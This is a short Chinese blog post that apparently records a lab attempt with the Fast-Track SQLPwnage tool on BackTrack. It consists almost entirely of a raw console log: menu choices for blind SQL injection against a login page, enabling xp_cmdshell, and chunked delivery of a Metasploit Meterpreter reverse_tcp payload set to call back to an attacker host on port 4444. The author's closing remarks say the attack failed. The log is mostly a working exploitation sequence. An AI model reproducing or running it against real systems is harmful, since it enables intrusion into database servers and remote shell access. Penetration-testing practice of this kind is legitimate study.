这次也是失败的,操作如下:
root@bt:/pentest/exploits/fasttrack# ./fast-track.py -i
Fast-Track Main Menu:
1. Fast-Track Updates
2. Autopwn Automation
3. Nmap Scripting Engine
4. Microsoft SQL Tools
5. Mass Client-Side Attack
6. Exploits
7. Binary to Hex Payload Converter
8. Payload Generator
9. Fast-Track Tutorials
10. Fast-Track Changelog
11. Fast-Track Credits
12. Exit Fast-Track
Enter the number: 4
Microsoft SQL Attack Tools
1. MSSQL Injector
2. MSSQL Bruter
3. SQLPwnage
(q)uit
Enter your choice : 3
SQLPwnage Main Menu:
1. SQL Injection Search/Exploit by Binary Payload Injection (BLIND)
2. SQL Injection Search/Exploit by Binary Payload Injection (ERROR BASED)
3. SQL Injection single URL exploitation
<ctrl>-c to Cancel
Enter your choice: 1
Scan a subnet or spider single URL?
1. url
2. subnet (new)
3. subnet (lists last scan)
Enter the Number: 1
Enter IP address (ex: www.xxxxx.com): http://192.168.1.109/login.jsp
http://192.168.1.109/login.jsp
50000
Crawling http://192.168.1.109/login.jsp (Max Depth: 50000)
DONE
Found 0 links, following 0 urls in 0+0:0:0
Spidering is complete.
*************************************************************************
http://192.168.1.109/login.jsp
*************************************************************************
[+] Number of forms detected: 2 [+]
What type of payload do you want?
1. Custom Packed Fast-Track Reverse Payload (AV Safe)
2. Metasploit Reverse VNC Inject (Requires Metasploit)
3. Metasploit Meterpreter Payload (Requires Metasploit)
4. Metasploit TCP Bind Shell (Requires Metasploit)
Select your choice: 3
Enter the port you want to listen on: 4444
[+] Importing 64kb debug bypass payload into Fast-Track... [+]
[+] Import complete, formatting the payload for delivery.. [+]
[+] Payload Formatting prepped and ready for launch. [+]
[+] Executing SQL commands to elevate account permissions. [+]
[+] Initiating stored procedure: 'xp_cmdhshell' if disabled. [+]
[+] Delivery Complete. [+]
Launching MSFCLI Meterpreter Handler
Creating Metasploit Reverse Meterpreter Payload..
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"192.168.1.11", "LPORT"=>"4444"}
Taking raw binary and converting to hex.
Raw binary converted to straight hex.
[+] Bypassing Windows Debug 64KB Restrictions. Evil. [+]
[+] Sending chunked payload. Number 1 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 2 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 3 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 4 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 5 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 6 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 7 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 8 of 9. This may take a bit. [+]
[+] Sending chunked payload. Number 9 of 9. This may take a bit. [+]
[+] Conversion from hex to binary in progress. [+]
[+] Conversion complete. Moving the binary to an executable. [+]
[+] Splitting the hex into 100 character chunks [+]
[+] Split complete. [+]
[+] Prepping the payload for delivery. [+]
Sending chunk 1 of 15, this may take a bit...
Sending chunk 2 of 15, this may take a bit...
Sending chunk 3 of 15, this may take a bit...
Sending chunk 4 of 15, this may take a bit...
Sending chunk 5 of 15, this may take a bit...
Sending chunk 6 of 15, this may take a bit...
Sending chunk 7 of 15, this may take a bit...
Sending chunk 8 of 15, this may take a bit...
Sending chunk 9 of 15, this may take a bit...
Sending chunk 10 of 15, this may take a bit...
Sending chunk 11 of 15, this may take a bit...
Sending chunk 12 of 15, this may take a bit...
Sending chunk 13 of 15, this may take a bit...
Sending chunk 14 of 15, this may take a bit...
Sending chunk 15 of 15, this may take a bit...
Using H2B Bypass to convert our Payload to Binary..
Running cleanup before launching the payload....
[+] Launching the PAYLOAD!! This may take up to two or three minutes. [+]
You should have a shell if everything went good..Might take a couple seconds
这个也要在图形界面下运行才行,除非修改代码。
操作失败了,原因和上次一样:
在XP上生成的h2b.exe无法运行。
标签:Sending,15,fasttrack,...,may,SQLPwnage,失败,take,bit From: https://blog.51cto.com/u_1002776/6228456